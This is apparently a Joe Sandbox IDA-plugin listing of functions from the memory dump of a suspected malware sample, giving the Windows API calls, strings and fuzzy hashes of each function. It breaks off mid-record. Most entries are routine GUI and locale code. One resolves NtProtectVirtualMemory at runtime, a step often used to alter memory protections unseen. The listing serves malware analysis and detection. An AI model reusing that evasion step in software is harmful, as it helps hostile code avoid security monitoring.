Part of subcall function 041EB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,041EBBE7,?,?,00000000), ref: 041EBB98
EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 041EBBA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,041EBBE7,?,?,00000000), ref: 041EBBC1
EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 041EBBCC

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 1028215d0c77197d1555670a3b46425e8b5c29822dcde8f0c8bdd3f121a78852
Instruction ID: ef2e4251b8051d81a8c727b13c786275d917f915924cd867e1caf08298dad83a
Opcode Fuzzy Hash: 1028215d0c77197d1555670a3b46425e8b5c29822dcde8f0c8bdd3f121a78852
Instruction Fuzzy Hash: 7E01DF7CB08E046BFA11FA668C92F7E7258DB86718F910560F404E66D4D734BE009668

Uniqueness

Uniqueness Score: -1.00%

Function 04232570 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 0423257F
SetEvent.KERNEL32(00000000,04234D8A), ref: 0423259A
GetCurrentThreadId.KERNEL32 ref: 0423259F
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,04234D8A), ref: 042325B4
CloseHandle.KERNEL32(00000000,00000000,04234D8A), ref: 042325BF

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 7766d956b5b35b650e101398647a32c14c0dc9846661ce45cbbfe1e092a7c5d3
Instruction ID: 5e449f30817562f73fd750b696ead4513241930c722706cd94808736946cc7ad
Opcode Fuzzy Hash: 7766d956b5b35b650e101398647a32c14c0dc9846661ce45cbbfe1e092a7c5d3
Instruction Fuzzy Hash: 8CF0A5B5B106119FD768EBBEF88CA2D33F4E704226B444998A118C3180E73CB841CB21

Uniqueness

Uniqueness Score: -1.00%

Function 041EBC00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,041EBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 041EBC2F

Part of subcall function 041EB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2

Strings

ggg, xrefs: 041EBD15
eeee, xrefs: 041EBD3E
yyyy, xrefs: 041EBD25

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 95c7266ceb16ae7ea2598f07261efc5327b7ad05f86d9971ff9a67144b1aa02d
Instruction ID: cd204d79bac2f5857762fc0306f83ae2196ef9abe0713222c834a81e570c8613
Opcode Fuzzy Hash: 95c7266ceb16ae7ea2598f07261efc5327b7ad05f86d9971ff9a67144b1aa02d
Instruction Fuzzy Hash: C541242C70CD054BF701EA7B89C02BEB2EAEB8520CB144565E462E7344EB38FD069765

Uniqueness

Uniqueness Score: -1.00%

Function 04213498 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 042134E6
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 04213538
DrawMenuBar.USER32(00000000), ref: 04213545

Strings

P, xrefs: 042134D8

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: b8d70658382c2658ab376a75750859cd73cdde9259c1aabd3cd63fcfb289b114
Instruction ID: b78ae9e61310daecfc7867929eb32cf319447573ddaecf00d97c609231523a6c
Opcode Fuzzy Hash: b8d70658382c2658ab376a75750859cd73cdde9259c1aabd3cd63fcfb289b114
Instruction Fuzzy Hash: BA1101702152016FF350DB28CC80B5A7BDAAF88764F148628F494DB2E4D739E844C786

Uniqueness

Uniqueness Score: -1.00%

Function 041FFC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 041FFC21
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFC27

Strings

NtProtectVirtualMemory, xrefs: 041FFC17
C:\Windows\System32\ntdll.dll, xrefs: 041FFC1C

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: e4dc4ddbc0df274581b4046873a796b66ae1cf8da8ddcfb2bf5ce649740bd6f3
Instruction ID: 35a82db8a57706308d5e551833402d2213209e1fe6e3394b5eb6c0c4f4c7ec9e
Opcode Fuzzy Hash: e4dc4ddbc0df274581b4046873a796b66ae1cf8da8ddcfb2bf5ce649740bd6f3
Instruction Fuzzy Hash: 47E0B6B6600248AF8B40EF9DECC9D9B77ECAB1C7217804001BA18C7200D775F8528B74

Uniqueness

Uniqueness Score: -1.00%

Function 041ED6A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0424910B,00000000,0424911E), ref: 041ED6A6
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 041ED6B7

Strings

GetDiskFreeSpaceExA, xrefs: 041ED6B1
kernel32.dll, xrefs: 041ED6A1

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 1fd6cfcba0693d595f204bdb77316e77b6ac4316dd411eca5a1d82e5f61a5e5b
Instruction ID: f2f799dafd3c2da5abb1a371471bb0320dbf0dee50e9c4c2a701d37945472739
Opcode Fuzzy Hash: 1fd6cfcba0693d595f204bdb77316e77b6ac4316dd411eca5a1d82e5f61a5e5b
Instruction Fuzzy Hash: 1FD0C7AC791F46DFFB00BFAB74C863522E4E798315B80056568086E144D7F9BC45CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0421D52C Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 0421D6AB
MulDiv.KERNEL32(?,?,?), ref: 0421D6E6

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69bc3aba5a3486ec98753ede914a1ad08f184e1d357aedafdfc02d9951d551f
Instruction ID: d072e7d1ab2bdaad22cb01ab09c328572f3c5aeb5a6007c55c43076fc781d939
Opcode Fuzzy Hash: d69bc3aba5a3486ec98753ede914a1ad08f184e1d357aedafdfc02d9951d551f
Instruction Fuzzy Hash: 29D16874B14A4ADFDB11CFA8C484AAABBF6FF49300F108959E4569B364D774F902CB50

Uniqueness

Uniqueness Score: -1.00%

Function 042180E0 Relevance: 6.2, APIs: 4, Instructions: 212COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 04218155
GetDesktopWindow.USER32 ref: 04218285
SetCursor.USER32(00000000), ref: 042182DA

Part of subcall function 04223C30: ImageList_EndDrag.COMCTL32(?,-00000010,042182B5), ref: 04223C4C

SetCursor.USER32(00000000), ref: 042182C5

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CursorDesktopWindow$DragImageList_
String ID:
API String ID: 617806055-0
Opcode ID: 432f8db706a20ec966b0569526b11c67c2a9d48d4185137a7409885e66b32620
Instruction ID: 3a567283aec7db757f382f8b69473c0508d54d48ebf23fcbfa47f32d71aad277
Opcode Fuzzy Hash: 432f8db706a20ec966b0569526b11c67c2a9d48d4185137a7409885e66b32620
Instruction Fuzzy Hash: 5B9112347106428FDB04EF2EE2CCA597BE1EBA9364F098594E8448B365C738EC85DB91

Uniqueness

Uniqueness Score: -1.00%

Function 041EF554 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 041EF603
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 041EF61F
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 041EF696
VariantClear.OLEAUT32(?), ref: 041EF6BF

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 5d4be543ba095f1bc5bc122169f71f0bcacf991c7befa09d1f02ac241e11e9a6
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: 1241E779A01A19ABDB61EF59C8D0BE9B3BCAF4C204F0441D5E949E7211DB30AF858F54

Uniqueness

Uniqueness Score: -1.00%

Function 041EBE3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 041EBE59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 041EBE7D
GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041EBE98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 041EBF2E

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 6ce0d177713dd2b987802c0ce97263b3edabee3e93a42254fc45931021fbbf25
Instruction ID: c1fce9cbb10f5a8d577ab200da686c2ab561656b193adbe4f4435a32cffa1a12
Opcode Fuzzy Hash: 6ce0d177713dd2b987802c0ce97263b3edabee3e93a42254fc45931021fbbf25
Instruction Fuzzy Hash: E8411C78A046589BEB21DB6ADCC4BEAB7FDAB18304F4400E9E508E7251D774BF848F54

Uniqueness

Uniqueness Score: -1.00%

Function 041EBE3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 041EBE59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 041EBE7D
GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041EBE98
LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 041EBF2E

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 9386d7ab4691533b429c56c96d61860f62456abccc8b37f8d17b74d143d6a3df
Instruction ID: 9edf5f3964f91ce2713a0b17ac75d28a4671aaa4732325e79f9a5f40b7734a7b
Opcode Fuzzy Hash: 9386d7ab4691533b429c56c96d61860f62456abccc8b37f8d17b74d143d6a3df
Instruction Fuzzy Hash: D3411D78A046589BEB21DB6ADCC4BEAB7ED9B18304F4400E5A508E7251D774FF848F54

Uniqueness

Uniqueness Score: -1.00%

Function 04231538 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 0423157D
GetDC.USER32(00000000), ref: 042315D2
GetDeviceCaps.GDI32(00000000,0000005A), ref: 042315DC
ReleaseDC.USER32(00000000,00000000), ref: 042315E7

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID:
API String ID: 3331096196-0
Opcode ID: 8c647d4ddf319e1a1ea735481cf05d213f161f03b471706fe183a9ef03162c9b
Instruction ID: 56f206f7c70d338800decf77d411a09cb5d66929cac90a75e3c0bb0067318344
Opcode Fuzzy Hash: 8c647d4ddf319e1a1ea735481cf05d213f161f03b471706fe183a9ef03162c9b
Instruction Fuzzy Hash: BC3117B46102419FE740EF6ED8C4BA97BE1FB04319F4980A9E818CF352D736AC46CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04204CBC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04202E8C: EnterCriticalSection.KERNEL32(0427A3A0,00000000,0420183E,00000000,0420189D), ref: 04202E94
Part of subcall function 04202E8C: LeaveCriticalSection.KERNEL32(0427A3A0,0427A3A0,00000000,0420183E,00000000,0420189D), ref: 04202EA1
Part of subcall function 04202E8C: EnterCriticalSection.KERNEL32(00000038,0427A3A0,0427A3A0,00000000,0420183E,00000000,0420189D), ref: 04202EAA

Part of subcall function 0420614C: GetDC.USER32(00000000), ref: 042061A2
Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 042061B7
Part of subcall function 0420614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 042061C1
Part of subcall function 0420614C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04204D0F,00000000,04204D9B), ref: 042061E5
Part of subcall function 0420614C: ReleaseDC.USER32(00000000,00000000), ref: 042061F0

CreateCompatibleDC.GDI32(00000000), ref: 04204D11
SelectObject.GDI32(00000000,?), ref: 04204D2A
SelectPalette.GDI32(00000000,?,000000FF), ref: 04204D53
RealizePalette.GDI32(00000000), ref: 04204D5F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: 3801c4cc7e882643be7b68efc2b5e0d770eeccc77e635e189c6878f7350a0183
Instruction ID: 521ee6d1aa39dba0c4ff62ceb911041ec5317b6a23e564aac72371b2562d3aa8
Opcode Fuzzy Hash: 3801c4cc7e882643be7b68efc2b5e0d770eeccc77e635e189c6878f7350a0183
Instruction Fuzzy Hash: 3131E274B10618EFE714EB59C980D5DB3F5FF48324BA285A1A904AB3A2D730FE41DA50

Uniqueness

Uniqueness Score: -1.00%

Function 04213B5C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetMenuState.USER32(?,?,?), ref: 04213B7F
GetSubMenu.USER32(?,?), ref: 04213B8A
GetMenuItemID.USER32(?,?), ref: 04213BA3
GetMenuStringA.USER32(?,?,?,?,?), ref: 04213BF6

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
Instruction ID: 18f466e1b29d4fcb90571f2cac90a6d94a58e32799c0226622d61d6e42a01ca1
Opcode Fuzzy Hash: fb3a58c3da9fc6d7ae6682bba016efb31c07ea6290ae3b7c05858ba206872267
Instruction Fuzzy Hash: 6E117F35320114AFEB10EE6DCCC0EAF7BE99F59264B104469FD19D72A0E630BE01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 041FD6E2 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 041FD6EF
GetCurrentThreadId.KERNEL32 ref: 041FD6FE
EnterCriticalSection.KERNEL32(0427A2EC), ref: 041FD743
InterlockedExchange.KERNEL32(0424AAF0,?), ref: 041FD75F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID:
API String ID: 2380408948-0
Opcode ID: b36cc0acbe39077cb09b014c78590d19391d9d96ffbdb8ebf0bd654b86520d6a
Instruction ID: 479551d89f214ea34a73268d9adc7b3618184e0bdffd9934dc5e241b7c94f7f4
Opcode Fuzzy Hash: b36cc0acbe39077cb09b014c78590d19391d9d96ffbdb8ebf0bd654b86520d6a
Instruction Fuzzy Hash: 1321CF34B04A44AFE710DBA9ECC5B79B7B8EB05708F9185A4EA02D7250D775B842CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04232D14 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

EnumWindows.USER32(Function_00052CA4), ref: 04232D49
GetWindow.USER32(00000003,00000003), ref: 04232D61
GetWindowLongA.USER32(00000000,000000EC), ref: 04232D6E
SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 04232DAD

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: 13fc44ea40636d926eb4e80b68c1371ecc92ce0ffe3ed32542d05a69e42b0e7f
Instruction ID: 480cc745eaac0ed17de1ef2c377a424a997de13616a939ca6e42b9f09175c8da
Opcode Fuzzy Hash: 13fc44ea40636d926eb4e80b68c1371ecc92ce0ffe3ed32542d05a69e42b0e7f
Instruction Fuzzy Hash: C7115A757146109FEB20AA2CDCC5FA977A4EF05725F5502A4FEA8EB2D2C370B841C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0421A024 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 0421A039
MulDiv.KERNEL32(?), ref: 0421A056
MulDiv.KERNEL32(?), ref: 0421A073
MulDiv.KERNEL32(?), ref: 0421A090

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction ID: 18af632b2fdc4912444116edbf9e1609aae87291583c18dfb4ceed71edeac078
Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
Instruction Fuzzy Hash: CF014B2470560C6B9734BD2A5CC4F6B3A9DDFE1654B404138782D8B312EA66FC15C2A8

Uniqueness

Uniqueness Score: -1.00%

Function 04217F28 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 04217F35
GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,04217FA0,-000000F7,?,00000000,04217B5A,?,-00000010,?), ref: 04217F3E
GlobalFindAtomA.KERNEL32(00000000), ref: 04217F53
GetPropA.USER32(00000000,00000000), ref: 04217F6A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: deaab41f2c822bc84a1f27229963b3ad5c287f55b05d5a38985f61e77cf54e62
Instruction ID: 3d5a030d46a1482ad8fdecaa60d3119be87364c2fc6038c6a98a35c5ce9b08c8
Opcode Fuzzy Hash: deaab41f2c822bc84a1f27229963b3ad5c287f55b05d5a38985f61e77cf54e62
Instruction Fuzzy Hash: 04F0A01932A92267BB107BAA6DC487F21CC9EE07687944031FC00C3060D758FD4191B5

Uniqueness

Uniqueness Score: -1.00%

Function 04216FC8 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?), ref: 04216FD5
GetCurrentProcessId.KERNEL32(?,00000000,?,04213C39,?,04212CF5), ref: 04216FDE
GlobalFindAtomA.KERNEL32(00000000), ref: 04216FF3
GetPropA.USER32(?,00000000), ref: 0421700A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 41f8136ad7f3f1b238d8fb1c3ca991a4d6cc92db8a858b8c1ff75c332c12098b
Instruction ID: 0b27f241ba7fbb5e352f56939f6db4e77d9f83f00787d41464a3e7eb92a5a918
Opcode Fuzzy Hash: 41f8136ad7f3f1b238d8fb1c3ca991a4d6cc92db8a858b8c1ff75c332c12098b
